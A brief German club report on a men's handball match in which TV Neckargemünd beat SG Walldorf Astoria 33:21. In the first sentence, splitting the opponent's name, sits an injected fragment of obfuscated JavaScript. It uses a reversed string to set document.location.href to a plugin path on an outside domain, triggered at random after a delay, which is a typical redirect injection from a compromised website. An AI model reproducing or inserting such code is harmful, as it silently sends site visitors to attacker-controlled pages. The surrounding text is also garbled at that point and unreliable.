1. Herren: Klarer Sieg gegen Walldorf

Im Heimspiel des TV Neckargemünd gegen SG Walldorf Astoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria M2 gab es einen klaren Heimsieg für Neckargemünd. In der ersten Halbzeit führte Neckargemünd bedingt durch gute Abwehr und viele Tempogegenstöße. Walldorf holte dann etwas auf, jedoch konnte Neckargemünd mit einer 18:14 Führung in die Pause gehen. In der zweiten Halbzeit blieb Neckargemünd bis zur 40. Min stets zwei bis drei Tore vorne. Dank guter Torwartleistung und guter Abwehrarbeit, sowie druckvollem Angriffsspiel, baute Neckargemünd den Vorsprung weiter aus. Das Spiel endete mit einem 33:21 Sieg für den TV Neckargemünd.